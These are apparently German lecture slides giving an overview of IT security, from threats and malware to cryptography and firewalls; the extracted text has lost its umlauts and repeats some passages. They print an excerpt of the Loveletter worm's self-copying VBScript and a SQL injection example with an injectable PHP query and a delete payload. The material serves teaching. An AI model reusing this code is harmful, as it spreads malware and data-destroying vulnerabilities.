Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 1 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems IT Sicherheit Ein berblick
Folie 2
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 2 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems
Folie 3
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 3 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems
Folie 4
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 4 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems
Folie 5
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 5 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems
Folie 6
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 6 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Inhalt l berblick l Potentielle Risiken (Auswahl) l
Beispiele fr Lsungen Authentisierung Wer greift auf Daten/Systeme
zu ? Verschlsselung Daten vertraulich halten Firewall Netze gegen
Angreifer schtzen l Was tun ?
Folie 7
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 7 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Datensicherheit: DIN 44300, Teil 1. l Schutz von Daten
gegen Beeintrchtigung (Verlust, Zerstrung, nderung) und vor
Mibrauch l Datenschutz: Schutz von Personen vor Beeintrchtigungen
durch Verarbeitung von Daten Spionage Betrug (Nicht-) Verfgbarkeit
Sabotage
Folie 8
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 8 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Sicherheitskriterien l Integritt Konsistenz Korrektheit
DoS, DDoS, mail flooding l Vertraulichkeit Zugriff nur durch
berechtigte Personen Hacker l Verbindlichkeit Authentisierung von
Nutzern Persistenz fake orders spoofing l Verfgbarkeit Zugriff
jederzeit mglich Spionage Betrug Nicht- Verfgbarkeit Sabotage
Beispiele fr Risiken Viren Schaden weltweit 2003: 50 Milliarden $
???
Folie 9
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 9 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems MS Outlook Loveletter: Liebe macht blind.... @ MS Outlook @
@ @ @ @ @ @ @ @ @ @
Folie 10 =1) then wscr.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin =
fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set
dirtemp = fso.GetSpecialFolder(2) Set c =
fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs").... rem barok
-loveletter(vbe) rem by: spyder / [email protected] / @GRAMMERSoft
Group / Manila,Philippines On Error Resume Next dim
fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow eq="" ctr=0
Set fso = CreateObject("Scripting.FileSystemObject") set file =
fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll
main() sub main() On Error Resume Next dim wscr,rr set
wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows
Scripting Host\Settings\Timeout") if (rr>=1) then wscr.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin =
fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set
dirtemp = fso.GetSpecialFolder(2) Set c =
fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")....">
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 10 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Loveletter Quelltext (Auszug) rem barok -loveletter(vbe)
rem by: spyder / [email protected] / @GRAMMERSoft Group /
Manila,Philippines On Error Resume Next dim
fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow eq="" ctr=0
Set fso = CreateObject("Scripting.FileSystemObject") set file =
fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll
main() sub main() On Error Resume Next dim wscr,rr set
wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows
Scripting Host\Settings\Timeout") if (rr>=1) then wscr.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin =
fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set
dirtemp = fso.GetSpecialFolder(2) Set c =
fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs").... rem barok
-loveletter(vbe) rem by: spyder / [email protected] / @GRAMMERSoft
Group / Manila,Philippines On Error Resume Next dim
fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow eq="" ctr=0
Set fso = CreateObject("Scripting.FileSystemObject") set file =
fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll
main() sub main() On Error Resume Next dim wscr,rr set
wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows
Scripting Host\Settings\Timeout") if (rr>=1) then wscr.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin =
fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set
dirtemp = fso.GetSpecialFolder(2) Set c =
fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")....
Folie 11
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 11 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Aktuelle Viren Intervall zwischen Entdeckungn und Schutz
durch Anti-Viren Software !
Folie 12
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 12 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems SQL-Injection....... File index.htm... $selstring = "SELECT
* FROM Address WHERE name=$sstring'"; $conn =
pg_Connect("localhost", "5432","","","somedb"); $result =
pg_Exec($conn, $selstring);... File db-request.php Maier Maier;
delete from address
Folie 13
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 13 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Distributed Denial-of-Service Attack (DDoS). victim Angriff
slave installing a demon master Hack Angreifer Probleme:
Unterschied zwischen echten und falschen Anfragen Verteilte
Netzwerk- Infrastruktur Intrusion Detection Systems
http://www.iss.net
Folie 14
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 14 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Wardriving, LAN jacking
Folie 15
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 15 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Gegenmanahmen
VerfgbarkeitVerbindlichkeitVertraulichkeitIntegritt intrusion
detection Digitale Signaturen Verschlssel- ung, VPN Firewall
Zugangs- kontrolle Backup Paswort Biometrie Virenscanner Managed
Security Services
Folie 16
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 16 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Script Kiddies Ntige Vorkenntnisse der Hacker complexity of
hacker tools source: c't 2/2002, S. 79 guessing of passwords
viruses cracking of passwords intrusion into not secured system web
worms
Folie 17
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 17 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Beispiel: Unberechtigten Zugriff verhindern l user
identification Passwort, Biometrie, Authentisierungsverfahren l
Nutzerrechte Wer darf auf welche Resourcen zugreifen l
Zugriffskontrolle firewall, Intrusion Detection Systeme l
Verschlsselung Zugriff auf Daten bleibt zwar mglich, diese sind
aber nutzlos
Folie 18
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 18 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems lBrute force hack Ausprobieren aller
Buchstabenkombinationen lDictionary hack Systematisches
Ausprobieren von hufiger verwendeten Wrtern (aus Worllisten)
Hybride Verfahren : Kombination von Wrterbuch und Ausprobieren von
Buchstanben/Zahlen lSpionage Blick ber die Schulter Trojanische
Pferde, key logger lSocial Engineering Ausnutzen der Naivitt von
Anwendern Z.B. fake mail an Angestellte mit sender spoofing ("IT
security dept.") zur Abfrage von Kennwrtern Studie von BBC News
zeigte, da 92% der Teilnehmer bereit waren, persnliche Angaben wie
etwa Geburtsname der Mutter, Grundschule,... Zu verraten (Comm. ACM
Vol. 48/6 p. 10) Password cracking.
Folie 19
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 19 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Default Kennwrter
Folie 20
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 20 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Ziemlich einfach...
Folie 21
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 21 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Social Engineering. Original und Flschung
Folie 22
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 22 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Beispiel Telekom Phishing mail
Folie 23
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 23 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Biometrie
Folie 24
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 24 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems eTokens. http://www.aks.com/
Folie 25
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 25 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Verschlsselung Problem Datenbertragung ber ffentliche Netze
ist ffentlich ! (insbesondere bei Funknetzen) Lsung Private Netze
(teuer) oder Verschlsselung: Der Absender wendet (mathematische)
Funktion auf die Daten an, die nur (!) vom Empfnger rckgngig
gemacht werden kann Absender: E = e(K 1,M) : K = key, M = message
Empfnger: M = d(K 2,E) : E = encrypted message, Funktioniert, wenn
M = d(K 2,e(K 1,M)) symmetrisch, wenn K 1 =K 2, sonst
asymmetrisch
Folie 26
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 26 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Substitutionsschlssel Einfache Verschlsselungstechnik:
Jedes Zeichen wird durch ein anderes ersetzt Das
Transformationsschema ist der Schlssel: Originalalphabet:
abcdefghijklmnopqrstuvwxyz Schlssel: qfwgxbdkpjhyzstiarnouvcelm
Verschlsselter Text: q wkpbbrx kqn ot xsnurx xauqy irtfqfpypopxn
btr qyy wkqrqwoxrn ot irxvxso npziyx brxauxswl fqnxg qsqylnpn q
npziyx nufnopouopts pn sto nubbpwpxso qslftgl cpok q fpo tb opzx tr
q wtziuoxr wqs frxqh nuwk wtgxn xqnpyl okxnx wtgxn cxrx unxg usopy
okx spsxoxxsok wxsourl qsg cxrx rxiyqwxg fl wtgxn okqo wkqsdx okx
nufnopouopts iqooxrs cpok xqwk wkqrqwoxr
Folie 27
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 27 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Kryptoanalyse Relative Hufigkeit der einzelnen Buchstaben
Im verschlsselten TextIn (englischem) Text a 0.006 b 0.020 c 0.011
d 0.003 e 0.000 f 0.026 g 0.023 h 0.003 i 0.020 j 0.000 k 0.040 l
0.020 m 0.000 n 0.062 o 0.085 p 0.060 q 0.071 r 0.051 s 0.051 t
0.040 u 0.037 v 0.003 w 0.048 x 0.114 y 0.028 z 0.011 a 0.096 b
0.015 c 0.038 d 0.039 e 0.114 f 0.020 g 0.013 h 0.035 i 0.071 j
0.002 k 0.003 l 0.047 m 0.030 n 0.065 o 0.082 p 0.034 q 0.001 r
0.061 s 0.067 t 0.095 u 0.028 v 0.008 w 0.016 x 0.005 y 0.012 z
0.002
Folie 28
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 28 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Entschlsselter Text a chiffre has to ensure equal
probabilities for all characters to prevent simple frequency based
analysis a simple substitution is not sufficient anybody with a bit
of time or a computer can break such codes easily these codes were
used until the nineteenth century and were replaced by codes that
change the substitution pattern with each character
Gedankenexperiment: Eine Nachricht ist genau ein Zeichen lang Ist
hier Kryptoanalyse mglich ? Nein ! Wenn der Schlssel (mindestens)
die gleiche Lnge hat, wie die Nachricht, kann sie nicht
entschlsselt werden ! One time pad
Folie 29
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 29 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Vernam-Chiffre Eine lange, zufllige Folge von Zeichen wird
als Schlssel verwendet, Verschlsselung beispielsweise durch
Addition mit dem Klartext (modulo 26). Erzeugung von K durch
(Pseudo-) Zufallsgenerator Schlssel: AXVBF Text: HALLO Darstellung
als Zahlen, z.B. A=1, B=2 usw. Schlssel: 1 24 22 2 6 Text M 1 : 8 1
12 12 15 E 1 : 9 25 8 14 21 (IYHNU) Problem: Wird mehrfach der
gleiche Schlssel verwendet, ist Kryptoanalyse mglich: M 2 = WELT,
K= HALLO, E 2 = 24 3 8 22 Aber D= E 1 -E 2 = M 1 -M 2 = -15 22 0
-8, wenn M 1 bekannt M 2 = M 1 -D = (8+15) (1-22) (12-0) (12+8) =
23 5 12 20 = WELT known plaintext attack, siehe WEP
Folie 30
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 30 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Enigma
Folie 31
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 31 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Moderne Verschlsselungsverfahren l Kombination von
Substitution und Transposition DES (alt), AES (neu) l symmetrisch:
Schlssel fr Sender und Empfnger gleich Problem: Wie bermittelt man
den Schlssel ? An viele Partner Lange Schlssel (one time pad)
Ungelst ! l asymmetrisch: unterschiedliche Schlssel zum Ver- und
Entschlsseln Public/Private key Diskrete Mathematik: Faktorisierung
groer Zahlen ist (extrem) rechenaufwndig l Signatur: one way
functions
Folie 32
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 32 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Typen von Verschlsselungsverfahren Stromschlssel
verschlsseln eine Folge von einzelnen Zeichen Schlssel blicherweise
durch Zufallsgenerator Blockschlssel verschlsseln Blcke fester
Lnger (typ. 64 Bit)
Folie 33
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 33 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems DES Anforderungen l 1973 wurde vom NIST die Entwicklung
eines Verschlsselungsverfahrens ausgeschrieben, Anforderungen: Hohe
Sicherheit Effizient implementierbar flexibel Sicherheit soll nur
vom Schlssel abhngen, nicht von einem geheimen Algorithmus l
Vorschlag von IBM wurde (von NSA berprft und berarbeitet)
akzeptiert und standardisiert l Blockchiffre l 56 Bit (64 Bit)
Schlssellnge
Folie 34
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 34 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems DES Funktionsweise
[http://www.itl.nist.gov/fipspubs/fip46-2.htm]
Folie 35
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 35 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Aktueller Stand l DES mit 56 Bit Schlssellnge ist heute
durch brute force knackbar 1998 deep crack ca. 24 Stunden, ca.
300.000$ 2006 COPACABANA, ca. 1 Woche, ca. 10.000 $ NSA kann
vermutlich DES in 3-15 Minuten knacken, ca. 50.000 $ [Schneier,
Applied Cryptography] l Triple DES Dreimal hintereinander DES,
langsam ! Verschiedene Verfahren mit zwei oder drei verschiedenen
Schlsseln Effektive Schlssellnge 112 Bit Z.B. Geldautomaten l AES
als Ersatz seit 2000 Variable Block- und Schlssellnge (bis 256 Bit)
Z.B. WPA2, SSH, IPSEC, Windows EFS
Folie 36
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 36 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Integritt l unbeabsichtigte nderungen bertragungsfehler,
Hardware,... l Prsummen beabsichtigte nderungen Prfsummen sind
leicht zu flschen krypthografische Verfahren
Folie 37
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 37 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Beispiel: MD5 l erzeugt aus einer beliebig langen Nachricht
einen 128 Bit langen Wert l Beispiel: Der Text Heute ist schnes
Wetter ergibt den Hash a353cee72e0558710e2f89fb18841283a Empfnger
berechnet ebenfalls den MD5 Hash der Nachricht und vergleicht mit
dem bermittelten, ereinstimmung --> Nachricht korrekt bermittelt
l Problem: Dritte Partei fngt die Nachricht ab und ersetzt sie
durch eine andere (mit neuem, passenden hash) l Lung: Der Absender
verschlsselt den hash-Wert mit seinem private key. Der Empfnger
berprft nach Entschlsselung mit dem public key des
Absenders.(Digitale Signatur)
Folie 38
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 38 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Firewalls Internet LAN Firewall Eine Firewall ist ein
zentraler Kontrollpunkt zwischen dem Internet und dem LAN
Folie 39
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 39 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Router Internet Router leitet IP-Pakete weiter, vom LAN ins
Internet, vom Internet ins LAN Screening Router (Paketfilter)
leitet nur Pakete weiter, die def. Regeln entsprechen (IP-Adressen,
Ports usw.)
Folie 40
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 40 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Personal firewall Internet Computer Browser Mail client
Application Personal Firewall Eine personal firewall ist ein
eingebauter Paketfilter, der anwendungsbezogen filtert Die
Sicherheit ist fragwrdig Oft kombiniert mit Viren-Scanner
Folie 41
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 41 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Was wird gemacht ? 81 58 55 29 26 24 79 82 52 71 34 30 37
17 43 86 29 antivirus software Virtual Private Networks (VPN)
automatic backup personal firewalls content filtering intrusion
detection systems network firewalls application irewalls Dial-Back-
or secure modems Germany USA source: IT-Security 2003; Juni-Juli,
2500 Interviews with CIOs; in Percent
Folie 42
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 42 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Best practices. l Einsatz einer application layer firewall.
l Automatische Updates der Virenschutz-Software auf Firewall,
Servern und Clients l Aktuelle Updates einspielen: Hackers nutzen
oft bekannte Sicherheitslcken aus, um in Systeme einzubrechen l
Abschalten aller nicht bentigten Dienste l Lschen aller nicht
bentigten Programme l Netzwerke nach backdoors, Trojanern und
anderen Sicherheitslcken scannen, Intrusion Detection Systeme
verwenden
Folie 43
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 43 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Probleme bei sicheren Systemen l Die meisten (einfachen)
Angriffe sind leicht abzublocken l Wie hlt man
qualifizierte/motivierte Hacker auf ? l Tradeoff: Sicherheit
UsabilityKosten Problem: Schlechte Usability kann Sicherheit
verschlechtern: Restriktive Password policy --> schwer zu merken
--> Nutzer schreiben Passwrter auf oder verwenden
Standardpawort
Folie 44
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 44 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Clevere Lsungen..... l Persnliche Fragen statt Kennwrtern
personal entropy Name Ihres Haustiers ? Der Name von Paris Hiltons
Hund ist Tinkerbell (Bunte o..) Ihr T-Mobile Account wurde gehackt
l Nach mehrfacher Eingabe eines falschen Kennworts wird der login
fr bestimmte Zeit gesperrt Sie bieten auf einen Artikel bei ebay
und wissen den Namen eines Mitbieters, versuchen sich mit seinem
Namen und einem beliebigen Kennwort anzumelden --> sein Account
wird geblockt --> Denial of Service attack l Was wre, wenn
Geldautomaten den Fingerabdruck prfen wrden ? Vielleicht weniger
Betrug ? Vielleicht mehr Raubberflle? (siehe Wegfahrsperre)
Folie 45
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 45 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Auch die fortschrittlichste Technologie....
Folie 46
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 46 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Lt sich umgehen, wenn man wirklich will....
Folie 47
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 47 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Man kann Angreifern nur das Leben schwerer machen
Folie 48
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 48 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Es gibt keine absolute Sicherheit l Wenn jemand behauptet,
ein unknackbares System zu haben, ist er entweder naiv, oder er lgt
! Das schwchste Glied zhlt SQL-Slammer took out 20% of ATM machines
in US (costed banks tens of millions of dollars), Continental
coudnt fly for 12 hours, why ? Not the servers were vulnerable, but
the network connections were overloaded. l Designschwchen
(Protokolle, Programmiersprachen,...) Wurden nicht fr die heutigen
Anwendungen konzipiert Lsungen wren bekannt, sind aber aufwendig:
Direkter Zugriff auf den Stack bei vielen Programmiersprachen
Buffer overflows knnten verhindert werden, ist aber mehr Arbeit
SQL-injection knnte verhindert werden, ebenfalls mehr Arbeit l
Programmierfehler (bugs) ermglichen exploits, Patches kommen immer
zu spt (zero day exploits) Fehlerfreie Software zu erstellen ist
extrem schwer (unmglich ?) Bessere Prozee bei der SW-Entwicklung
helfen, aber...
Folie 49
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 49 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems
Folie 50
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 50 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Was ist sicher genug l Wieviel Sicherheit wird gebraucht ?
Analyse der Risiken, Schden usw. ntig Online Wettervorhersage vs.
Online-banking l Wieviel Sicherheit ist gewollt ? Usability Kosten
l Umgang mit Risiken technisch Organisatorisch (Schulungen,...) l
Keine Standardlsungen l Security ist eine boomende Branche
Communications of the ACM Vol 48/6 pp. 82
Folie 51
Prof. Till Hnisch, Prof. Dr. Hans Jrgen Ott 51 Univ. of
Cooperative Education Heidenheim, Dpt. of Business Information
Systems Fragen ?
